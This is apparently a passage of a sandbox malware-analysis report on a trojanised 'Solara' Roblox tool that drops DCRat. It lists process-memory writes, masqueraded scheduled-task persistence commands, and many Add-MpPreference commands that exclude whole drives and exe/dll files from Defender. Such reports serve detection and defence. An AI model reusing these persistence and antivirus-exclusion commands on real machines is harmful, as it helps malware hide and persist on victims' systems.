Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\conhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\winNet\ComContainerbrowserRefRuntime.exe N/A
Token: SeDebugPrivilege N/A C:\DriversavessessionDlldhcp\Roblox.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\LogonUI.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 5088 wrote to memory of 1380 N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe C:\Users\Admin\AppData\Local\Temp\Youtube.exe
PID 5088 wrote to memory of 1380 N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe C:\Users\Admin\AppData\Local\Temp\Youtube.exe
PID 5088 wrote to memory of 1380 N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe C:\Users\Admin\AppData\Local\Temp\Youtube.exe
PID 5088 wrote to memory of 976 N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe C:\Users\Admin\AppData\Local\Temp\Solara.exe
PID 5088 wrote to memory of 976 N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe C:\Users\Admin\AppData\Local\Temp\Solara.exe
PID 1380 wrote to memory of 3412 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\Result.exe
PID 1380 wrote to memory of 3412 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\Result.exe
PID 1380 wrote to memory of 3412 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\Result.exe
PID 1380 wrote to memory of 3148 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1380 wrote to memory of 3148 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1380 wrote to memory of 3148 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3412 wrote to memory of 4376 N/A C:\Users\Admin\AppData\Local\Temp\Result.exe C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
PID 3412 wrote to memory of 4376 N/A C:\Users\Admin\AppData\Local\Temp\Result.exe C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
PID 3412 wrote to memory of 4376 N/A C:\Users\Admin\AppData\Local\Temp\Result.exe C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
PID 3412 wrote to memory of 3856 N/A C:\Users\Admin\AppData\Local\Temp\Result.exe C:\Windows\System32\Conhost.exe
PID 3412 wrote to memory of 3856 N/A C:\Users\Admin\AppData\Local\Temp\Result.exe C:\Windows\System32\Conhost.exe
PID 3412 wrote to memory of 3856 N/A C:\Users\Admin\AppData\Local\Temp\Result.exe C:\Windows\System32\Conhost.exe
PID 1380 wrote to memory of 1336 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe
PID 1380 wrote to memory of 1336 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe
PID 1380 wrote to memory of 1980 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\Frage build.exe
PID 1380 wrote to memory of 1980 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\Frage build.exe
PID 1380 wrote to memory of 1980 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\Frage build.exe
PID 3856 wrote to memory of 2324 N/A C:\Users\Admin\AppData\Local\Temp\solara.exe C:\Windows\SysWOW64\WScript.exe
PID 3856 wrote to memory of 2324 N/A C:\Users\Admin\AppData\Local\Temp\solara.exe C:\Windows\SysWOW64\WScript.exe
PID 3856 wrote to memory of 2324 N/A C:\Users\Admin\AppData\Local\Temp\solara.exe C:\Windows\SysWOW64\WScript.exe
PID 1980 wrote to memory of 4208 N/A C:\Users\Admin\AppData\Local\Temp\Frage build.exe C:\Windows\SysWOW64\WScript.exe
PID 1980 wrote to memory of 4208 N/A C:\Users\Admin\AppData\Local\Temp\Frage build.exe C:\Windows\SysWOW64\WScript.exe
PID 1980 wrote to memory of 4208 N/A C:\Users\Admin\AppData\Local\Temp\Frage build.exe C:\Windows\SysWOW64\WScript.exe
PID 3148 wrote to memory of 4388 N/A C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe C:\Windows\SysWOW64\WScript.exe
PID 3148 wrote to memory of 4388 N/A C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe C:\Windows\SysWOW64\WScript.exe
PID 3148 wrote to memory of 4388 N/A C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe C:\Windows\SysWOW64\WScript.exe
PID 2324 wrote to memory of 3444 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 2324 wrote to memory of 3444 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 2324 wrote to memory of 3444 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 3444 wrote to memory of 4556 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe
PID 3444 wrote to memory of 4556 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe
PID 4376 wrote to memory of 1512 N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe C:\Windows\SysWOW64\msiexec.exe
PID 4376 wrote to memory of 1512 N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe C:\Windows\SysWOW64\msiexec.exe
PID 4376 wrote to memory of 1512 N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe C:\Windows\SysWOW64\msiexec.exe
PID 4556 wrote to memory of 1956 N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4556 wrote to memory of 1956 N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4556 wrote to memory of 4172 N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4556 wrote to memory of 4172 N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4556 wrote to memory of 1936 N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4556 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4556 wrote to memory of 3532 N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4556 wrote to memory of 1656 N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4556 wrote to memory of 1320 N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4556 wrote to memory of 1016 N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4556 wrote to memory of 3148 N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4556 wrote to memory of 3228 N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe C:\Program Files (x86)\Internet Explorer\en-US\services.exe
PID 408 wrote to memory of 5284 N/A C:\Windows\system32\msiexec.exe C:\Windows\System32\MsiExec.exe
PID 408 wrote to memory of 5520 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe

"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"

C:\Users\Admin\AppData\Local\Temp\Youtube.exe

"C:\Users\Admin\AppData\Local\Temp\Youtube.exe"

C:\Users\Admin\AppData\Local\Temp\Solara.exe

"C:\Users\Admin\AppData\Local\Temp\Solara.exe"

C:\Users\Admin\AppData\Local\Temp\Result.exe

"C:\Users\Admin\AppData\Local\Temp\Result.exe"

C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe

"C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe"

C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe

"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"

C:\Users\Admin\AppData\Local\Temp\solara.exe

"C:\Users\Admin\AppData\Local\Temp\solara.exe"

C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe

"C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe"

C:\Users\Admin\AppData\Local\Temp\Frage build.exe

"C:\Users\Admin\AppData\Local\Temp\Frage build.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\aImCrmZyeD77A2ANdrk.vbe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\DriversavessessionDlldhcp\ghJPtatrYDLygnNWh9dEZv.vbe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\winNet\we9fgyC144zVOkGk.vbe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\4F0VCIGGZPxdNa.bat" "

C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe

"C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smsss" /sc MINUTE /mo 13 /tr "'C:\Windows\Globalization\smss.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Windows\Globalization\smss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smsss" /sc MINUTE /mo 7 /tr "'C:\Windows\Globalization\smss.exe'" /rl HIGHEST /f

C:\Windows\SysWOW64\msiexec.exe

"msiexec" /i "C:\Users\Admin\AppData\Local\Temp\node-v18.16.0-x64.msi" /qn

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "servicess" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Internet Explorer\en-US\services.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Program Files (x86)\Internet Explorer\en-US\services.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "servicess" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Internet Explorer\en-US\services.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "WaaSMedicAgentW" /sc MINUTE /mo 7 /tr "'C:\Windows\ServiceProfiles\LocalService\AppData\Local\WaaSMedicAgent.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "WaaSMedicAgent" /sc ONLOGON /tr "'C:\Windows\ServiceProfiles\LocalService\AppData\Local\WaaSMedicAgent.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "WaaSMedicAgentW" /sc MINUTE /mo 9 /tr "'C:\Windows\ServiceProfiles\LocalService\AppData\Local\WaaSMedicAgent.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\fr\wscript.exe'" /f

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wscript" /sc ONLOGON /tr "'C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\fr\wscript.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\fr\wscript.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 10 /tr "'C:\DriversavessessionDlldhcp\OfficeClickToRun.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\DriversavessessionDlldhcp\OfficeClickToRun.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 7 /tr "'C:\DriversavessessionDlldhcp\OfficeClickToRun.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 12 /tr "'C:\Program Files\Microsoft Office\Updates\Apply\FilesInUse\DF15FCEA-4EE4-4717-AEF3-17B0F643CB2A\upfc.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "upfc" /sc ONLOGON /tr "'C:\Program Files\Microsoft Office\Updates\Apply\FilesInUse\DF15FCEA-4EE4-4717-AEF3-17B0F643CB2A\upfc.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 13 /tr "'C:\Program Files\Microsoft Office\Updates\Apply\FilesInUse\DF15FCEA-4EE4-4717-AEF3-17B0F643CB2A\upfc.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 10 /tr "'C:\Windows\INF\unsecapp.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "unsecapp" /sc ONLOGON /tr "'C:\Windows\INF\unsecapp.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 13 /tr "'C:\Windows\INF\unsecapp.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 14 /tr "'C:\Recovery\WindowsRE\SppExtComObj.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SppExtComObj" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\SppExtComObj.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\SppExtComObj.exe'" /rl HIGHEST /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Globalization\smss.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Internet Explorer\en-US\services.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\ServiceProfiles\LocalService\AppData\Local\WaaSMedicAgent.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\fr\wscript.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\DriversavessessionDlldhcp\OfficeClickToRun.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft Office\Updates\Apply\FilesInUse\DF15FCEA-4EE4-4717-AEF3-17B0F643CB2A\upfc.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\INF\unsecapp.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\SppExtComObj.exe'

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Program Files (x86)\Internet Explorer\en-US\services.exe

"C:\Program Files (x86)\Internet Explorer\en-US\services.exe"

C:\Windows\System32\MsiExec.exe

C:\Windows\System32\MsiExec.exe -Embedding 34C2A3A69E024CB4C7B0C517EDF7E726

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 9CA52EDF1FB02B86CAF11FFDF8772F58

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe"

C:\Windows\System32\cmd.exe

"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"

C:\Windows\System32\cmd.exe

"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "Bloxstrap" /tr "C:\Users\Admin\Bloxstrap.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "Bloxstrap" /tr "C:\Users\Admin\Bloxstrap.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\winNet\rsH0xIUsPk2E2Mq2a4QwbDGWD6K8lz.bat" "

C:\winNet\ComContainerbrowserRefRuntime.exe

"C:\winNet/ComContainerbrowserRefRuntime.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\oensqgEQyM.bat"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\DriversavessessionDlldhcp\exFbRiwQoowToPhSTKSA9iYE.bat" "

C:\DriversavessessionDlldhcp\Roblox.exe

"C:\DriversavessessionDlldhcp/Roblox.exe"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 13 /tr "'C:\Users\Admin\AppData\Local\fontdrvhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Local\fontdrvhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 12 /tr "'C:\Users\Admin\AppData\Local\fontdrvhost.exe'" /rl HIGHEST /f

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\fndgbpbq\fndgbpbq.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESEB69.tmp" "c:\Windows\Globalization\CSC2CD0480A80E4347B591AF5A63AD67F8.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gajwrdcm\gajwrdcm.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESEC06.tmp" "c:\Program Files (x86)\Internet Explorer\en-US\CSC303836A264394C678FCD25C781BA961.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xxy4xula\xxy4xula.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESECE0.tmp" "c:\Windows\ServiceProfiles\LocalService\AppData\Local\CSC70844B7B29D341BB8FFEB0D5E4D717C1.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ygr5rsmn\ygr5rsmn.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESEDAC.tmp" "c:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\fr\CSCD001DCB125214A0B80DFE133AEEDE5C5.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5wuucn45\5wuucn45.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESEE38.tmp" "c:\DriversavessessionDlldhcp\CSC76713A34752A4219B360FE67E2AA80B4.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qtiq0lxh\qtiq0lxh.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESEEE4.tmp" "c:\Program Files\Microsoft Office\Updates\Apply\FilesInUse\DF15FCEA-4EE4-4717-AEF3-17B0F643CB2A\CSC12D29C43C81F4764B8FEAC1A37A61A8B.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jxvfqvj3\jxvfqvj3.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESEF90.tmp" "c:\Windows\INF\CSCDBBF15C0A2E44A13B9B3BE52BA80BFB1.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hqptlwsx\hqptlwsx.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF04B.tmp" "c:\Recovery\WindowsRE\CSCD4EEB679672C4DAB87BA924129211EBC.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4ycibn0e\4ycibn0e.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF117.tmp" "c:\Windows\System32\CSC62BB1B8EFB064D2FB0E4DA2F7861CE5D.TMP"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RobloxR" /sc MINUTE /mo 11 /tr "'C:\DriversavessessionDlldhcp\Roblox.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "Roblox" /sc ONLOGON /tr "'C:\DriversavessessionDlldhcp\Roblox.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RobloxR" /sc MINUTE /mo 10 /tr "'C:\DriversavessessionDlldhcp\Roblox.exe'" /rl HIGHEST /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Config.Msi/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/DriversavessessionDlldhcp/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/winNet/'

